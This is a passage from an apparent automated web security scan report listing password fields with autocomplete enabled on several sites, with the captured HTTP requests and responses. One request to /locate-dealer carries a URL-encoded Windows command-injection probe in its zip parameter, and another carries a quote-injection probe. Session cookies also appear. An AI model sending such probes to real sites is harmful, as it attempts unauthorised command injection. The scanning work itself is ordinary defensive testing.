Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=02isqjnj84clkgrigupugsjs41; has_js=1; __utma=150814896.1501451648.1311108783.1311108783.1311108783.1; __utmb=150814896.4.9.1311108916173; __utmc=150814896; __utmz=150814896.1311108783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:59:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:59:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div class="content">
<form action="/locate-dealer?destination=node%2F1456%3Fzip%3D%252527" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.9. http://waypointlivingspaces.com/locate-dealer  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /locate-dealer

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /locate-dealer?zip=%22%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Host: waypointlivingspaces.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:53:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:53:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div class="content">
<form action="/locate-dealer?destination=node%2F1456%3Fzip%3D%2522%2526%2520SET%2520%252FA%25200xFFF9999-2%2520%2526" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

15.10. http://waypointlivingspaces.com/user  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://waypointlivingspaces.com
Path:   /user

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /user HTTP/1.1
Host: waypointlivingspaces.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSe2d9d7ad8ae79606f307f1e56494fe09=02isqjnj84clkgrigupugsjs41; has_js=1; __utma=150814896.1501451648.1311108783.1311108783.1311108783.1; __utmb=150814896.2.9.1311108792839; __utmc=150814896; __utmz=150814896.1311108783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:55:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 19 Jul 2011 20:55:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head
...[SNIP]...
<div id="main-content" class="region clear-block">
<form action="/user" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
<div class="description">
...[SNIP]...

15.11. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.boston.com
Path:   /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links HTTP/1.1
Host: www.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Etag: 71649c45-ebf6-409f-85b6-7e83c3d59026
Content-Type: text/html;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:47 GMT
Set-Cookie: bcpage=9;expires=Wed, 22-Jun-2016 20:43:47 GMT;path=/;domain=boston.com;
Content-Length: 42969
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="eng">
<!-- Methode uuid: "b12c8144-b20e-11e0-aa83-a59fd6e1b552" -->
<head>
<title
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...

15.12. http://www.facebook.com/advertising/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /advertising/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /advertising/?campaign_id=402047449186&placement=pflo&extra_1=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.88.37
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:45 GMT
Content-Length: 22238

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/advertising\/index.php";window._EagleEyeSeed="42vQ";</scr
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.13. http://www.facebook.com/ajax/intl/language_dialog.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.111.31
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:23 GMT
Content-Length: 42761

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/ajax\/intl\/language_dialog.php";window._EagleEyeSeed="bq
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.14. http://www.facebook.com/badges/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /badges/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fbadges%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.92.64
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:33 GMT
Content-Length: 15265

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/badges\/index.php";window._EagleEyeSeed="emCA";</script><
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.15. http://www.facebook.com/careers/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.121.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:50 GMT
Content-Length: 20897

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/careers\/index.php";window._EagleEyeSeed="Ikcl";</script>
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.16. http://www.facebook.com/directory/pages/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.102.50
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:38 GMT
Content-Length: 49022

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="0cuF";</scrip
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.17. http://www.facebook.com/directory/people/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.82.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:34 GMT
Content-Length: 39849

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="kzvV";</scrip
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.18. http://www.facebook.com/facebook  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.89.42
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:40 GMT
Content-Length: 130477

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.19. http://www.facebook.com/find-friends  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:28 GMT
Content-Length: 104185

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/vanityurl.php";window._EagleEyeSeed="ZSxE";</script><nosc
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.20. http://www.facebook.com/help/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

15.21. http://www.facebook.com/mobile/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
